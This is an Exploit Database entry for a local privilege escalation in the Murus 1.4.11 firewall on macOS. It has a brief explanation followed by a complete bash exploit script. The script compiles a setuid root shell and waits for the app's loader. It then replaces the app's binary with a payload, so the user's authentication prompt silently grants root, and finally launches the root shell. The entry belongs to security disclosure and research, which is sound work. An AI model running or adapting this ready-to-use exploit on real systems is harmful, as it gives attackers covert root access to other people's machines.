Murus 1.4.11 – Local Privilege Escalation

• Exploit Database
• 32 阅读

• 作者： Mark Wadham
  日期： 2017-12-06
• 类别：

  • local
  平台：

  • macos
• 来源：https://www.exploit-db.com/exploits/43217/

• # I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus
  # firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings.
  
  # If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access
  # without the user knowing.
  
  # https://m4.rkw.io/murus1.4.11.sh.txt
  # 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301
  # -------------------------------------------------------------------------------
  #!/bin/bash
  
  ##################################################################
  ###### Murus 1.4.11 local root privilege escalation exploit ######
  ###### by m4rkw - https://m4.rkw.io/blog.html ######
  ##################################################################
  
  echo "compiling payloads..."
  
  cat > /tmp/murus411_exp.c <<EOF
  #include <unistd.h>
  int main()
  {
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);
  return 0;
  }
  EOF
  
  gcc -o /tmp/murus411_exp /tmp/murus411_exp.c
  
  if [ ! $? -eq 0 ] ; then
  rm -f /tmp/murus411_exp.c
  	echo "failed to compile, dev tools may not be installed"
  exit 1
  fi
  
  rm -f /tmp/murus411_exp.c
  
  cat > /tmp/murus411_exp2.c <<EOF
  #include <unistd.h>
  #include <stdlib.h>
  int main()
  {
  setuid(0);
  seteuid(0);
  system("chown root:wheel /tmp/murus411_exp");
  system("chmod 4755 /tmp/murus411_exp");
  system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\
  Murus.app/Contents/MacOS/Murus");
  execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL);
  return 0;
  }
  EOF
  
  gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c
  rm -f /tmp/murus411_exp2.c
  
  echo "waiting for loader..."
  
  while :
  do
  ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \
  |grep -v grep 1>/dev/null
  if [ $? -eq 0 ] ; then
  break
  fi
  done
  
  echo "planting payload..."
  
  mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\
  Contents/MacOS/Murus.orig
  mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus
  
  echo "waiting for payload to trigger..."
  
  while :
  do
  r=`ls -la /tmp/murus411_exp |grep root`
  if [ "$r" != "" ] ; then
  break
  fi
  sleep 0.1
  done
  
  echo "kapow"
  
  /tmp/murus411_exp